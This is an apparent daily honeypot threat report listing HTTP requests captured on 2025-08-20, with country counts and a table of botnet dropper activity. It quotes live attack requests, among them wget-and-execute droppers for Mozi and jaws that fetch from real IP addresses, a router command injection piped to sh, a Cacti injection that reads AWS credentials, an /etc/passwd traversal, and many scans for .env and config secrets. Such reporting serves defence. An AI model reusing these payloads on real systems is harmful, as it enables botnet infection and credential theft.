Daily Report: 2025-08-20#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 4 stage 1 IP address(es), linked to 4 dropper URL(s).
There are 209 new requests that have never been observed before (these were added to the monitored request database.).
A total of 3974 requests were recorded during the day, originating from 4 different countries, with a peak of 2936 requests coming from GB.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Germany |
BR | Germany |
US | Germany |
GB | Germany |
GB | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
122.97.209.138 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
197.45.114.121 | GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.150.159/jaws;sh+/tmp/jaws HTTP/1.1 |
45.156.87.165 | GET /cgi-bin/luci/er/reboot_link?link=%27%60wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.hqf.sh%7Csh%60%27 HTTP/1.1 |
45.156.87.165 | GET /cgi-bin/luci/er/vlanTag?vlan_tag=%27%60wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.hqf.sh%7Csh%60%27 HTTP/1.1 |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
94 | 2 | POST /users/loginusers/loginusers/login HTTP/1.1 |
95 | 2 | POST /users/loginusers/login HTTP/1.1 |
96 | 2 | POST /users/login HTTP/1.1 |
575 | 2 | GET /raephaeyeip4fawe HTTP/1.1 |
576 | 2 | GET /owa HTTP/1.1 |
577 | 2 | GET /ews HTTP/1.1 |
578 | 2 | POST /login.cgi HTTP/1.1 |
632 | 2 | POST /favicon.ico HTTP/1.1 |
1254 | 1 | {\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x1489f6ebc64b139fadd9fd10c301f1bdbae535f3\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22} |
1266 | 1 | GET /Odin/http/call1755713325 HTTP/1.1 |
1267 | 1 | GET /OdinHttpCall1755713325 HTTP/1.1 |
1269 | 1 | GET /odinhttpcall1755713325 HTTP/1.1 |
1271 | 1 | {\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2246iZmtzv97K4EfaWgrpK1dDeeEzD79fEV3RRGxRUm9sxZJn58BHhpGxT89QzpAwciJBXKoWT5AarG5fXuvRGsQZ1T4QQPea\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}} |
1351 | 1 | GET /.envs/.production/.django HTTP/1.1 |
1394 | 1 | GET //1.1.1.1/../../../etc/passwd HTTP/1.1 |
1437 | 1 | GET /admin/.env~ HTTP/1.1 |
1438 | 1 | GET /admin/.env.save HTTP/1.1 |
1466 | 1 | GET /admin/config.php.bak HTTP/1.1 |
1497 | 1 | GET /admin/wp-config.php.old HTTP/1.1 |
1535 | 1 | GET /api/config.json HTTP/1.1 |
1594 | 1 | GET /autodiscover/autodiscover.xml HTTP/1.1 |
1681 | 1 | GET /backup/.env~ HTTP/1.1 |
1682 | 1 | GET /backup/.env.save HTTP/1.1 |
1683 | 1 | GET /backup/.env.old HTTP/1.1 |
1695 | 1 | GET /backup/config.php.bak HTTP/1.1 |
1710 | 1 | GET /backup/wp-config.php.old HTTP/1.1 |
1734 | 1 | GET /jp/ HTTP/1.1 |
1735 | 1 | GET /uk/ HTTP/1.1 |
1736 | 1 | GET /es/ HTTP/1.1 |
1737 | 1 | GET /us/ HTTP/1.1 |
1738 | 1 | GET /cacti/cmd_realtime.php?1+1&&cat+~/.aws/credentials+1+1+1 HTTP/1.1 |
1763 | 1 | GET /config/.env~ HTTP/1.1 |
1764 | 1 | GET /config/.env.save HTTP/1.1 |
1765 | 1 | GET /config/.env.old HTTP/1.1 |
1776 | 1 | GET /config/config.php.bak HTTP/1.1 |
1805 | 1 | GET /config/secrets.json HTTP/1.1 |
1832 | 1 | GET /core/.env.local HTTP/1.1 |
1833 | 1 | GET /core/.env.bak HTTP/1.1 |
1835 | 1 | GET /config/wp-config.php.old HTTP/1.1 |
1845 | 1 | GET /core/.env~ HTTP/1.1 |
1860 | 1 | GET /core/config.php.bak HTTP/1.1 |
1876 | 1 | GET /core/wp-config.php.old HTTP/1.1 |
1882 | 1 | GET /OdFd HTTP/1.1 |
1907 | 1 | GET /ecp/Current/exporttool HTTP/1.1 |
1996 | 1 | \x22\x00\x00\x00\x12 \x10\x03\x1A\x05:8080\x22\x05:8080*\x06test_02\x06123456 |
2012 | 1 | 8RQ\xDD^\xC77X~\x00\x00\x00\x01e\xDD6\xB0kU,/\xC2/\xC1\x8F’\xF1\x00B\xF37\xD0\xA1P\xCA\xD4\xC3N\xCC\x95\xBC\xF5\x8C\x1AY\xA6\x14\x5C(\xCC\xE6D\xADd |
2026 | 1 | GET /nextjs-app/.env HTTP/1.1 |
2028 | 1 | GET /myproject/.env HTTP/1.1 |
2041 | 1 | GET /node-api/.env HTTP/1.1 |
2066 | 1 | GET /react-app/.env.production HTTP/1.1 |
2067 | 1 | GET /react-app/.env HTTP/1.1 |
2083 | 1 | GET /statistic/finishtask?siteid=20000&tid=9112 HTTP/1.1 |
2136 | 1 | GET /site/.env~ HTTP/1.1 |
2137 | 1 | GET /site/.env.save HTTP/1.1 |
2138 | 1 | GET /site/.env.old HTTP/1.1 |
2139 | 1 | GET /site/.env.local HTTP/1.1 |
2140 | 1 | GET /site/.env.bak HTTP/1.1 |
2148 | 1 | GET /site/config.php.bak HTTP/1.1 |
2163 | 1 | GET /site/wp-config.php.old HTTP/1.1 |
2175 | 1 | GET /src/.env~ HTTP/1.1 |
2176 | 1 | GET /src/.env.save HTTP/1.1 |
2177 | 1 | GET /src/.env.old HTTP/1.1 |
2187 | 1 | \x00\x00\x00o\x98I\xC7lp\xE4\x1BMM\x97<\xDF\xA9\xAE\xEB\x08\x00\x91o\x1D*R\xB1\xD6{nlUk\xE7\xA2\xFE5[*\xA7v\xA7C[\xEE\xC5vo 4G\xC5#\xE8\x0Fu\xC9\x5C\xFD\xBB\xB4\xF3\x9C\xBB\xD7e`\xBF |
2189 | 1 | GET /src/config.php.bak HTTP/1.1 |
2190 | 1 | GET /src/config.php HTTP/1.1 |
2220 | 1 | GET /i.dat HTTP/1.1 |
2236 | 1 | GET /src/wp-config.php.old HTTP/1.1 |
2260 | 1 | GET /web-console/ HTTP/1.1 |
2271 | 1 | GET /web/.env~ HTTP/1.1 |
2272 | 1 | GET /web/.env.save HTTP/1.1 |
2273 | 1 | GET /web/.env.old HTTP/1.1 |
2314 | 1 | GET /wordpress/wp-config.php HTTP/1.1 |
2315 | 1 | GET /web/wp-config.php.old HTTP/1.1 |
2316 | 1 | GET /web/config.php.bak HTTP/1.1 |
2325 | 1 | GET /wp-content/backup/sendgrid_keys.json HTTP/1.1 |
2326 | 1 | GET /wp-content/uploads/wp-mail-smtp/sendgrid_keys.json HTTP/1.1 |
2328 | 1 | GET /modules/contrib/sendgrid_mail/sendgrid_mail.services.yml HTTP/1.1 |
2329 | 1 | GET /modules/contrib/sendgrid_mail/sendgrid_mail.module HTTP/1.1 |
2331 | 1 | GET /wp-content/plugins/wp-mail-smtp/sendgrid_keys.json HTTP/1.1 |
2349 | 1 | GET /autodiscover/congress/ HTTP/1.1 |
2350 | 1 | GET /autodiscover/citizen/ HTTP/1.1 |
2351 | 1 | GET /autodiscover/because/ HTTP/1.1 |
2352 | 1 | GET /autodiscover/autodiscovers/ HTTP/1.1 |
2353 | 1 | GET /autodiscover/autodiscoverrs/ HTTP/1.1 |
2354 | 1 | GET /autodiscover/autodiscover%20/ HTTP/1.1 |
2357 | 1 | POST /cgi-bin/system_log.cgi? HTTP/1.1 |
2365 | 1 | GET /ews/autodiscovers/ HTTP/1.1 |
2366 | 1 | GET /ews/%20/ HTTP/1.1 |
2367 | 1 | GET /end/ HTTP/1.1 |
2368 | 1 | GET /empower/ HTTP/1.1 |
2369 | 1 | GET /dust/ HTTP/1.1 |
2370 | 1 | GET /delay/ HTTP/1.1 |
2371 | 1 | GET /behave/ HTTP/1.1 |
2372 | 1 | GET /autodiscover/verb/ HTTP/1.1 |
2373 | 1 | GET /autodiscover/tiger/ HTTP/1.1 |
2374 | 1 | GET /autodiscover/this/ HTTP/1.1 |
2375 | 1 | GET /autodiscover/surprise/ HTTP/1.1 |
2376 | 1 | GET /autodiscover/palace/ HTTP/1.1 |
2377 | 1 | GET /autodiscover/oppose/ HTTP/1.1 |
2378 | 1 | GET /autodiscover/make/ HTTP/1.1 |
2379 | 1 | GET /autodiscover/expire/ HTTP/1.1 |
2380 | 1 | GET /autodiscover/course/ HTTP/1.1 |
2381 | 1 | GET /ews/tower/ HTTP/1.1 |
2382 | 1 | GET /ews/test/ HTTP/1.1 |
2383 | 1 | GET /ews/six/ HTTP/1.1 |
2384 | 1 | GET /ews/sense/ HTTP/1.1 |
2385 | 1 | GET /ews/second/ HTTP/1.1 |
2386 | 1 | GET /ews/question/ HTTP/1.1 |
2387 | 1 | GET /ews/powder/ HTTP/1.1 |
2388 | 1 | GET /ews/pitch/ HTTP/1.1 |
2389 | 1 | GET /ews/often/ HTTP/1.1 |
2390 | 1 | GET /ews/jazz/ HTTP/1.1 |
2391 | 1 | GET /ews/feature/ HTTP/1.1 |
2392 | 1 | GET /ews/exchanges/ HTTP/1.1 |
2393 | 1 | GET /ews/exchange/ HTTP/1.1 |
2394 | 1 | GET /ews/exchange%20/ HTTP/1.1 |
2395 | 1 | GET /ews/ews/ HTTP/1.1 |
2396 | 1 | GET /ews/evoke/ HTTP/1.1 |
2397 | 1 | GET /lbsonlinesoc/august/ HTTP/1.1 |
2398 | 1 | GET /lbs/mystery/ HTTP/1.1 |
2399 | 1 | GET /lbsivr/travel/ HTTP/1.1 |
2400 | 1 | GET /lbsivr/pole/ HTTP/1.1 |
2401 | 1 | GET /lbsivr/noodle/ HTTP/1.1 |
2402 | 1 | GET /lbsivr/member/ HTTP/1.1 |
2403 | 1 | GET /lbs/blue/ HTTP/1.1 |
2404 | 1 | GET /lbs/alpha/ HTTP/1.1 |
2405 | 1 | GET /lbsadmin/valve/ HTTP/1.1 |
2406 | 1 | GET /lbsadmin/salon/ HTTP/1.1 |
2407 | 1 | GET /lbsadmin/disorder/ HTTP/1.1 |
2408 | 1 | GET /lbsadmin/cute/ HTTP/1.1 |
2409 | 1 | GET /hill/ HTTP/1.1 |
2410 | 1 | GET /fitness/ HTTP/1.1 |
2411 | 1 | GET /eye/ HTTP/1.1 |
2412 | 1 | GET /ews/trip/ HTTP/1.1 |
2413 | 1 | GET /oconlinesoc/silver/ HTTP/1.1 |
2414 | 1 | GET /oconlinesoc/provide/ HTTP/1.1 |
2415 | 1 | GET /oconlinesoc/nasty/ HTTP/1.1 |
2416 | 1 | GET /naive/ HTTP/1.1 |
2417 | 1 | GET /lbswap/useful/ HTTP/1.1 |
2418 | 1 | GET /lbswap/problem/ HTTP/1.1 |
2419 | 1 | GET /lbswap/goose/ HTTP/1.1 |
2420 | 1 | GET /lbswap/army/ HTTP/1.1 |
2421 | 1 | GET /lbs/special/ HTTP/1.1 |
2422 | 1 | GET /lbs/secure/seven/ HTTP/1.1 |
2423 | 1 | GET /lbs/secure/patch/ HTTP/1.1 |
2424 | 1 | GET /lbs/secure/model/ HTTP/1.1 |
2425 | 1 | GET /lbs/secure/feel/ HTTP/1.1 |
2426 | 1 | GET /lbsonlinesoc/shoulder/ HTTP/1.1 |
2427 | 1 | GET /lbsonlinesoc/menu/ HTTP/1.1 |
2428 | 1 | GET /lbsonlinesoc/gas/ HTTP/1.1 |
2429 | 1 | GET /route/ HTTP/1.1 |
2430 | 1 | GET /pulllocation/region/ HTTP/1.1 |
2431 | 1 | GET /pulllocation/jungle/ HTTP/1.1 |
2432 | 1 | GET /pulllocation/choice/ HTTP/1.1 |
2433 | 1 | GET /pulllocation/cabbage/ HTTP/1.1 |
2434 | 1 | GET /pelephoneprovisioning/stable/ HTTP/1.1 |
2435 | 1 | GET /pelephoneprovisioning/noodle/ HTTP/1.1 |
2436 | 1 | GET /pelephoneprovisioning/network/ HTTP/1.1 |
2437 | 1 | GET /pelephoneprovisioning/dizzy/ HTTP/1.1 |
2438 | 1 | GET /oshee/ HTTP/1.1 |
2439 | 1 | GET /onlinesoc/toddler/ HTTP/1.1 |
2440 | 1 | GET /onlinesoc/pole/ HTTP/1.1 |
2441 | 1 | GET /onlinesoc/man/ HTTP/1.1 |
2442 | 1 | GET /onlinesoc/fall/ HTTP/1.1 |
2443 | 1 | GET /ofasdaqgrumm/ HTTP/1.1 |
2444 | 1 | GET /oconlinesoc/usual/ HTTP/1.1 |
2446 | 1 | GET /utilities/.env HTTP/1.1 |
2449 | 1 | GET /test/.env.conf HTTP/1.1 |
2450 | 1 | GET /tmp/.env.token HTTP/1.1 |
2456 | 1 | GET /vzixmvmvbvrzhoo/ HTTP/1.1 |
2457 | 1 | GET /utkvvxwkwgseowps/ HTTP/1.1 |
2458 | 1 | GET /uncle/ HTTP/1.1 |
2459 | 1 | GET /Temporary_Listen_Addresses/ HTTP/1.1 |
2460 | 1 | GET /swear/ HTTP/1.1 |
2465 | 1 | GET /sicherung/.env HTTP/1.1 |
2466 | 1 | GET /src/env/env.ts HTTP/1.1 |
2469 | 1 | GET /tmp/.env.local HTTP/1.1 |
2472 | 1 | GET /var/.env.local HTTP/1.1 |
2473 | 1 | GET /staging/.env.1 HTTP/1.1 |
2474 | 1 | GET /symfony/env.py HTTP/1.1 |
2475 | 1 | GET /printenv.shtml HTTP/1.1 |
2476 | 1 | GET /staging/.env.2 HTTP/1.1 |
2477 | 1 | GET /panel/.env.old HTTP/1.1 |
2478 | 1 | GET /panel/.env.pem HTTP/1.1 |
2479 | 1 | GET /panel/.env.tmp HTTP/1.1 |
2480 | 1 | GET /panel/.env.uat HTTP/1.1 |
2505 | 1 | POST /cgi-bin/adv_remotelog.asp HTTP/1.1 |
2506 | 1 | GET /panel/.env.gcp HTTP/1.1 |
2507 | 1 | GET /panel/.env.key HTTP/1.1 |
2508 | 1 | GET /panel/.env.log HTTP/1.1 |
2509 | 1 | GET /download/file.extusers/loginusers/login HTTP/1.1 |
2510 | 1 | GET /download/file.extusers/login HTTP/1.1 |
2511 | 1 | GET /ausers/loginusers/loginusers/login HTTP/1.1 |
2512 | 1 | GET /ausers/loginusers/login HTTP/1.1 |
2513 | 1 | GET /ausers/login HTTP/1.1 |
2514 | 1 | GET /users/loginusers/loginusers/login HTTP/1.1 |
2515 | 1 | GET /users/loginusers/login HTTP/1.1 |
2516 | 1 | {\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x22454cKeGgMdnaw1J5zonuXb96XEfP2X51Z7oECWKpfjYPdhTm5kUpi6BBEuvUaxuL2p8s9YchmGaNTWTZKUXcYBcqTx4SUNQ\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}} |
2517 | 1 | {\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x6ee7628c6ade21a4148047f7bc4748859ac85f84\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22} |
2533 | 1 | \xA0\x05\x00`\x00\x00\x00\x00\xC4\xA3\xAFH\x99V\xB6\xB4\xEFM\xB4\xBF\xEA |
2534 | 1 | GET /mPlayerusers/loginusers/loginusers/login HTTP/1.1 |
2535 | 1 | GET /mPlayerusers/loginusers/login HTTP/1.1 |
2536 | 1 | GET /mPlayerusers/login HTTP/1.1 |
2537 | 1 | GET /SiteLoaderusers/loginusers/loginusers/login HTTP/1.1 |
2538 | 1 | GET /SiteLoaderusers/loginusers/login HTTP/1.1 |
2539 | 1 | GET /SiteLoaderusers/login HTTP/1.1 |
2540 | 1 | GET /download/file.extusers/loginusers/loginusers/login HTTP/1.1 |
2558 | 1 | \x00\x0E89\xB7\xED\xF2#\xE1 |
2559 | 1 | \x00\x0E\x089\xB7\xED\xF2#\xE1 |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 2936 | GB |
1 | 608 | HK |
2 | 97 | SG |
3 | 87 | US |
4 | 82 | BG |
5 | 37 | ES |
6 | 33 | NL |
7 | 29 | DE |
8 | 18 | SC |
9 | 5 | IN |
10 | 5 | CA |
11 | 4 | RO |
12 | 4 | BR |
13 | 3 | JP |
14 | 3 | LT |
15 | 3 | ZA |
16 | 2 | MM |
17 | 2 | HR |
18 | 2 | SA |
19 | 2 | PL |
20 | 2 | BE |
21 | 2 | MC |
22 | 1 | TR |
23 | 1 | PT |
24 | 1 | CN |
25 | 1 | EG |
26 | 1 | RU |
27 | 1 | GR |
28 | 1 | SI |
29 | 1 | IR |